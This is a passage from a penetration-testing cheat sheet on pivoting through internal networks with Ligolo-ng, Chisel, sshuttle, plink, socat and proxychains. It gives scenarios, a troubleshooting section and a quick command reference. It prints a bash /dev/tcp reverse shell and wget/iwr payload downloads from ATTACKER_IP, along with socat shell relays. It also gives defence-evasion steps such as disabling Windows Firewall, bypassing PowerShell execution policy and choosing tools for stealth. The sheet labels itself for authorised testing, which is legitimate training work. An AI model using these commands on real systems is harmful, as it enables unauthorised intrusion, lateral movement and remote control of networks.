    974 
    975 ### Scenario 5: Multiple Nested Networks (3+ Hops)
    976 
    977 **Situation:** Attacker -> Host A (10.10.10.5) -> Host B (192.168.1.10) -> Target Network (172.16.0.0/24)
    978 
    979 **Solution: Ligolo-ng Listener Chaining**
    980 ```bash
    981 # Step 1: Connect Agent A to attacker
    982 # On attacker
    983 ./proxy -selfcert -laddr 0.0.0.0:11601
    984 
    985 # On Host A
    986 ./agent -connect ATTACKER_IP:11601 -ignore-cert
    987 
    988 # Step 2: In ligolo console, create listener on Host A for Host B
    989 session 1
    990 listener_add --addr 0.0.0.0:11601 --to ATTACKER_IP:11601
    991 start
    992 
    993 # Step 3: Add route to Host A network
    994 sudo ip route add 192.168.1.0/24 dev ligolo
    995 
    996 # Step 4: From Host B, connect through Host A
    997 ./agent -connect 192.168.1.10:11601 -ignore-cert
    998 
    999 # Step 5: Select Host B session and add route
   1000 session 2
   1001 start
   1002 sudo ip route add 172.16.0.0/24 dev ligolo
   1003 
   1004 # Access final target network
   1005 nmap 172.16.0.5
   1006 ```
   1007 
   1008 ### Scenario 6: Catch Reverse Shell Through Tunnel
   1009 
   1010 **Situation:** Need to catch a reverse shell from internal network host (no direct route)
   1011 
   1012 **Solution: Ligolo-ng Listener (Reverse Port Forward)**
   1013 ```bash
   1014 # Setup tunnel to internal network (as usual)
   1015 ./proxy -selfcert -laddr 0.0.0.0:11601
   1016 ./agent -connect ATTACKER_IP:11601 -ignore-cert
   1017 
   1018 # In ligolo console, setup listener
   1019 session 1
   1020 listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444
   1021 start
   1022 
   1023 # On attacker, setup nc listener
   1024 nc -lvnp 4444
   1025 
   1026 # On target internal host, execute reverse shell to agent's IP
   1027 bash -i >& /dev/tcp/AGENT_IP/4444 0>&1
   1028 
   1029 # Shell appears on attacker's nc listener!
   1030 ```
   1031 
   1032 ### Scenario 7: Access Internal Web Application
   1033 
   1034 **Situation:** Internal web app at http://intranet.local (192.168.5.50:80), want to browse from attacker
   1035 
   1036 **Solution 1: Ligolo-ng (Direct Access)**
   1037 ```bash
   1038 # Setup tunnel
   1039 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute
   1040 ./agent -connect ATTACKER_IP:11601 -ignore-cert
   1041 
   1042 # Start tunnel
   1043 session 1; start
   1044 
   1045 # Add to /etc/hosts
   1046 echo "192.168.5.50 intranet.local" | sudo tee -a /etc/hosts
   1047 
   1048 # Browse directly
   1049 firefox http://intranet.local
   1050 ```
   1051 
   1052 **Solution 2: Chisel + Browser SOCKS Proxy**
   1053 ```bash
   1054 # Setup chisel
   1055 ./chisel server -p 8080 --reverse
   1056 ./chisel client ATTACKER_IP:8080 R:1080:socks
   1057 
   1058 # Configure Firefox SOCKS proxy:
   1059 # Preferences -> Network Settings -> Manual proxy
   1060 # SOCKS Host: 127.0.0.1, Port: 1080, SOCKS v5
   1061 # Browse to http://192.168.5.50
   1062 ```
   1063 
   1064 ### Scenario 8: RDP to Windows Machine in Internal Network
   1065 
   1066 **Situation:** Windows Server at 10.10.50.10, need RDP access
   1067 
   1068 **Solution 1: Through SOCKS Proxy**
   1069 ```bash
   1070 # Setup Chisel tunnel
   1071 ./chisel server -p 8080 --reverse
   1072 ./chisel client ATTACKER_IP:8080 R:1080:socks
   1073 
   1074 # Use proxychains with RDP client
   1075 proxychains4 xfreerdp /v:10.10.50.10 /u:administrator /p:password /cert-ignore
   1076 ```
   1077 
   1078 **Solution 2: Direct Port Forward**
   1079 ```bash
   1080 # Chisel reverse port forward
   1081 ./chisel client ATTACKER_IP:8080 R:3389:10.10.50.10:3389
   1082 
   1083 # Direct RDP connection
   1084 xfreerdp /v:127.0.0.1:3389 /u:administrator /p:password
   1085 ```
   1086 
   1087 ---
   1088 
   1089 ## Tool Selection Guide
   1090 
   1091 ### When to Use Each Tool
   1092 
   1093 #### Use LIGOLO-NG when:
   1094 - You need full network access (scanning, multiple services)
   1095 - Want transparent access without SOCKS/proxychains
   1096 - Have ability to upload agent binary
   1097 - Need clean, VPN-like experience
   1098 - Working with multiple nested networks
   1099 - Performance matters (faster than SOCKS)
   1100 
   1101 #### Use CHISEL when:
   1102 - Need quick SOCKS proxy setup
   1103 - Working through HTTP-only egress
   1104 - Want to forward specific ports
   1105 - Can't use SSH
   1106 - Need cross-platform support
   1107 - Working on HTB/CTF (widely supported)
   1108 
   1109 #### Use SSHUTTLE when:
   1110 - Target already has SSH running
   1111 - Don't want to upload any tools
   1112 - Need quick, transparent VPN-like access
   1113 - Working on Linux/Mac
   1114 - Want simple solution without agents
   1115 
   1116 #### Use PLINK when:
   1117 - Target is Windows
   1118 - SSH server available on attacker
   1119 - Can't upload other tools (plink is well-known, less suspicious)
   1120 - Need quick reverse tunnel
   1121 - Working with older Windows systems
   1122 
   1123 #### Use SOCAT when:
   1124 - Need encrypted tunnels (OpenSSL)
   1125 - Creating relay points
   1126 - Upgrading reverse shells to TTY
   1127 - Need UDP forwarding
   1128 - Want flexibility for custom scenarios
   1129 
   1130 #### Use NETCAT when:
   1131 - Just need basic port forwarding
   1132 - Creating simple relays
   1133 - Quick file transfers
   1134 - Testing connectivity
   1135 - Available on target (often pre-installed)
   1136 
   1137 #### Use PROXYCHAINS when:
   1138 - Already have SOCKS proxy (Chisel, SSH)
   1139 - Need to route tools that don't support proxies
   1140 - Want to chain multiple proxies
   1141 - Working with scanners/exploit tools
   1142 
   1143 ### Decision Tree
   1144 
   1145 ```
   1146 Do you have SSH access on target?
   1147 ├── YES: Use SSHuttle (simplest) or SSH tunneling
   1148 └── NO: Continue...
   1149 
   1150 Can you upload custom binaries?
   1151 ├── YES: Continue...
   1152 │   ├── Need VPN-like full network access?
   1153 │   │   └── YES: Use Ligolo-ng (best performance)
   1154 │   └── Need SOCKS proxy or port forward?
   1155 │       └── YES: Use Chisel (most versatile)
   1156 └── NO: Continue...
   1157     ├── Windows target?
   1158     │   ├── Plink available? -> Use Plink
   1159     │   └── Use netsh portproxy (built-in)
   1160     └── Linux/Unix target?
   1161         ├── Netcat available? -> Use Netcat relay
   1162         ├── Socat available? -> Use Socat
   1163         └── Bash only? -> Use /dev/tcp relay
   1164 ```
   1165 
   1166 ### Performance Comparison
   1167 
   1168 | Tool | Speed | Latency | Resource Usage | Stealth |
   1169 |------|-------|---------|----------------|---------|
   1170 | Ligolo-ng | Excellent | Low | Low | High |
   1171 | SSHuttle | Very Good | Low | Low | Very High |
   1172 | Chisel | Good | Medium | Low | Medium |
   1173 | SSH Tunnels | Very Good | Low | Low | Very High |
   1174 | Socat | Good | Low | Very Low | High |
   1175 | Netcat | Fair | Medium | Very Low | Medium |
   1176 
   1177 ---
   1178 
   1179 ## Troubleshooting
   1180 
   1181 ### Chisel Issues
   1182 
   1183 **Problem: Client connects but SOCKS proxy doesn't work**
   1184 ```bash
   1185 # Check if server is running with --reverse flag
   1186 ./chisel server -p 8080 --reverse
   1187 
   1188 # Verify SOCKS port is listening on attacker
   1189 ss -tlnp | grep 1080
   1190 
   1191 # Test SOCKS proxy
   1192 curl --socks5 127.0.0.1:1080 http://internal-host
   1193 ```
   1194 
   1195 **Problem: Connection refused / Can't connect**
   1196 ```bash
   1197 # Check firewall on attacker
   1198 sudo ufw allow 8080/tcp
   1199 
   1200 # Verify chisel is listening
   1201 ss -tlnp | grep 8080
   1202 
   1203 # Try different port (maybe 8080 is blocked)
   1204 ./chisel server -p 443 --reverse
   1205 ```
   1206 
   1207 ### Ligolo-ng Issues
   1208 
   1209 **Problem: TUN interface not created**
   1210 ```bash
   1211 # Linux - create manually
   1212 sudo ip tuntap add user $(whoami) mode tun ligolo
   1213 sudo ip link set ligolo up
   1214 
   1215 # Check if interface exists
   1216 ip addr show ligolo
   1217 
   1218 # macOS - install tuntap
   1219 brew install --cask tuntap
   1220 ```
   1221 
   1222 **Problem: Can't add routes / routes not working**
   1223 ```bash
   1224 # Check if tunnel is started
   1225 # In ligolo console: start
   1226 
   1227 # Verify route
   1228 ip route | grep ligolo
   1229 
   1230 # Check if interface is UP
   1231 ip link show ligolo
   1232 
   1233 # Try deleting and re-adding route
   1234 sudo ip route del 10.10.10.0/24 dev ligolo
   1235 sudo ip route add 10.10.10.0/24 dev ligolo
   1236 ```
   1237 
   1238 **Problem: Agent won't connect**
   1239 ```bash
   1240 # Check firewall
   1241 sudo ufw allow 11601/tcp
   1242 
   1243 # Verify proxy is listening
   1244 ss -tlnp | grep 11601
   1245 
   1246 # Try binding to specific IP
   1247 ./proxy -selfcert -laddr 0.0.0.0:11601
   1248 
   1249 # On agent, try explicit bind
   1250 ./agent -connect ATTACKER_IP:11601 -ignore-cert -bind 0.0.0.0
   1251 ```
   1252 
   1253 ### SSH / SSHuttle Issues
   1254 
   1255 **Problem: SSHuttle connection drops**
   1256 ```bash
   1257 # Use --no-latency-control
   1258 sshuttle -r user@host 10.10.10.0/24 --no-latency-control
   1259 
   1260 # Check SSH connection stability
   1261 ssh user@host 'while true; do date; sleep 5; done'
   1262 ```
   1263 
   1264 **Problem: SSH password authentication failed**
   1265 ```bash
   1266 # Enable password auth on SSH server
   1267 sudo vim /etc/ssh/sshd_config
   1268 # Set: PasswordAuthentication yes
   1269 sudo systemctl restart sshd
   1270 ```
   1271 
   1272 ### Proxychains Issues
   1273 
   1274 **Problem: DNS leaks / DNS not working**
   1275 ```bash
   1276 # In /etc/proxychains4.conf, ensure:
   1277 proxy_dns
   1278 
   1279 # Or add to config:
   1280 proxy_dns_old  # Use old method if new one fails
   1281 ```
   1282 
   1283 **Problem: Tool doesn't work with proxychains**
   1284 ```bash
   1285 # Some tools don't support SOCKS proxying
   1286 # Workaround: Use Ligolo-ng or SSHuttle instead
   1287 
   1288 # For nmap, always use:
   1289 proxychains4 nmap -sT -Pn target
   1290 # -sT: TCP connect (required)
   1291 # -Pn: Skip ping (ICMP doesn't work through SOCKS)
   1292 ```
   1293 
   1294 **Problem: "ERROR: ld.so: object 'libproxychains.so.3'"**
   1295 ```bash
   1296 # Find correct library
   1297 find /usr -name "libproxychains*"
   1298 
   1299 # Update config with correct path
   1300 sudo vim /etc/proxychains4.conf
   1301 # Update: /usr/lib/libproxychains4.so (or wherever it is)
   1302 ```
   1303 
   1304 ### Windows Specific Issues
   1305 
   1306 **Problem: PowerShell execution policy blocks scripts**
   1307 ```powershell
   1308 # Bypass execution policy
   1309 powershell -ExecutionPolicy Bypass -File script.ps1
   1310 
   1311 # Or set for current session
   1312 Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
   1313 ```
   1314 
   1315 **Problem: Windows Firewall blocks tunneling tools**
   1316 ```cmd
   1317 # Disable firewall (if you have admin)
   1318 netsh advfirewall set allprofiles state off
   1319 
   1320 # Or add specific rule
   1321 netsh advfirewall firewall add rule name="Chisel" dir=in action=allow program="C:\Temp\chisel.exe"
   1322 ```
   1323 
   1324 **Problem: Plink asks to cache host key (breaks automation)**
   1325 ```cmd
   1326 # Auto-accept with echo
   1327 echo y | plink.exe -R 9999:127.0.0.1:80 user@ATTACKER_IP -pw password
   1328 
   1329 # Or use -batch flag (doesn't prompt)
   1330 plink.exe -batch -R 9999:127.0.0.1:80 user@ATTACKER_IP -pw password
   1331 ```
   1332 
   1333 ### General Networking Issues
   1334 
   1335 **Problem: Can't reach internal network after setting up tunnel**
   1336 ```bash
   1337 # Check routing table
   1338 ip route  # Linux
   1339 route print  # Windows
   1340 netstat -nr  # macOS
   1341 
   1342 # Verify tunnel interface is UP
   1343 ip addr show
   1344 
   1345 # Test connectivity
   1346 ping INTERNAL_IP
   1347 traceroute INTERNAL_IP
   1348 
   1349 # Check if packet forwarding is enabled (Linux)
   1350 sysctl net.ipv4.ip_forward  # Should be 1
   1351 sudo sysctl -w net.ipv4.ip_forward=1
   1352 ```
   1353 
   1354 **Problem: Slow tunnel performance**
   1355 ```bash
   1356 # For SSH-based tunnels, enable compression
   1357 ssh -C -D 1080 user@host
   1358 
   1359 # For Chisel, try different port (avoid port 80/443 if proxy interferes)
   1360 ./chisel server -p 9999 --reverse
   1361 
   1362 # For Ligolo-ng, check MTU settings
   1363 # Reduce MTU if needed
   1364 sudo ip link set ligolo mtu 1400
   1365 ```
   1366 
   1367 **Problem: Firewall blocks outbound connections**
   1368 ```bash
   1369 # Try common allowed ports
   1370 # 80 (HTTP), 443 (HTTPS), 53 (DNS), 22 (SSH)
   1371 
   1372 # Chisel over HTTPS port
   1373 ./chisel server -p 443 --reverse
   1374 
   1375 # Ligolo-ng over HTTPS
   1376 ./proxy -selfcert -laddr 0.0.0.0:443
   1377 
   1378 # SSH over 443
   1379 ssh -p 443 user@host
   1380 ```
   1381 
   1382 ---
   1383 
   1384 ## Quick Command Reference
   1385 
   1386 ### Most Common Commands
   1387 
   1388 ```bash
   1389 # Quick SOCKS proxy with Chisel
   1390 ./chisel server -p 8080 --reverse                  # Attacker
   1391 ./chisel client ATTACKER_IP:8080 R:1080:socks     # Target
   1392 
   1393 # Ligolo-ng full tunnel
   1394 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute # Attacker
   1395 ./agent -connect ATTACKER_IP:11601 -ignore-cert   # Target
   1396 # Then: session 1 -> start
   1397 
   1398 # SSHuttle VPN
   1399 sshuttle -r user@pivot 10.0.0.0/8 --dns -vv
   1400 
   1401 # Reverse port forward
   1402 ssh -R 8080:localhost:80 user@attacker            # SSH
   1403 ./chisel client ATTACKER_IP:8080 R:8080:localhost:80  # Chisel
   1404 plink.exe -R 8080:localhost:80 user@attacker -pw pass  # Plink
   1405 
   1406 # Local port forward
   1407 ssh -L 8080:internal-host:80 user@pivot
   1408 ./chisel client ATTACKER_IP:8080 L:8080:internal-host:80
   1409 
   1410 # Dynamic SOCKS
   1411 ssh -D 1080 user@pivot
   1412 ./chisel client ATTACKER_IP:8080 1080:socks
   1413 
   1414 # Using proxychains
   1415 proxychains4 nmap -sT -Pn 10.10.10.0/24
   1416 proxychains4 firefox
   1417 proxychains4 msfconsole
   1418 
   1419 # File transfer
   1420 python3 -m http.server 8000                       # Attacker
   1421 wget http://ATTACKER_IP:8000/file -O /tmp/file    # Target Linux
   1422 iwr http://ATTACKER_IP:8000/file -o C:\Temp\file  # Target Windows
   1423 
   1424 # Reverse shell relay with socat
   1425 socat TCP-LISTEN:4444,fork TCP:ATTACKER_IP:4444   # Pivot
   1426 # Victim connects to pivot:4444
   1427 ```
   1428 
   1429 ---
   1430 
   1431 ## Additional Resources
   1432 
   1433 ### Port Reference
   1434 ```
   1435 Common Tunnel Ports:
   1436 - 11601: Ligolo-ng default
   1437 - 8080: Chisel default (HTTP alternative)
   1438 - 1080: SOCKS proxy standard
   1439 - 8888: Alternative HTTP forward
   1440 - 9050: Tor SOCKS proxy
   1441 - 22: SSH
   1442 ```
   1443 
   1444 ### Testing Connectivity
   1445 ```bash
   1446 # Check if port is open
   1447 nc -zv TARGET_IP PORT
   1448 
   1449 # Check HTTP service
   1450 curl -I http://TARGET_IP:PORT
   1451 
   1452 # Check SOCKS proxy
   1453 curl --socks5 127.0.0.1:1080 http://target
   1454 
   1455 # Test route
   1456 ping TARGET_IP
   1457 traceroute TARGET_IP
   1458 
   1459 # Check listening ports on local
   1460 ss -tlnp          # Linux
   1461 netstat -an | find "LISTEN"  # Windows
   1462 ```
   1463 
   1464 ### Useful Aliases (Add to ~/.bashrc or ~/.zshrc)
   1465 ```bash
   1466 # Quick HTTP server
   1467 alias serve='python3 -m http.server 8000'
   1468 
   1469 # Quick SOCKS with Chisel
   1470 alias chisel-server='~/tools/chisel/chisel server -p 8080 --reverse'
   1471 
   1472 # Proxychains shortcut
   1473 alias pc='proxychains4 -q'
   1474 
   1475 # Quick nmap through proxy
   1476 alias pcnmap='proxychains4 nmap -sT -Pn'
   1477 ```
   1478 
   1479 ---
   1480 
   1481 **Created for Security Testing & Authorized Penetration Testing Only**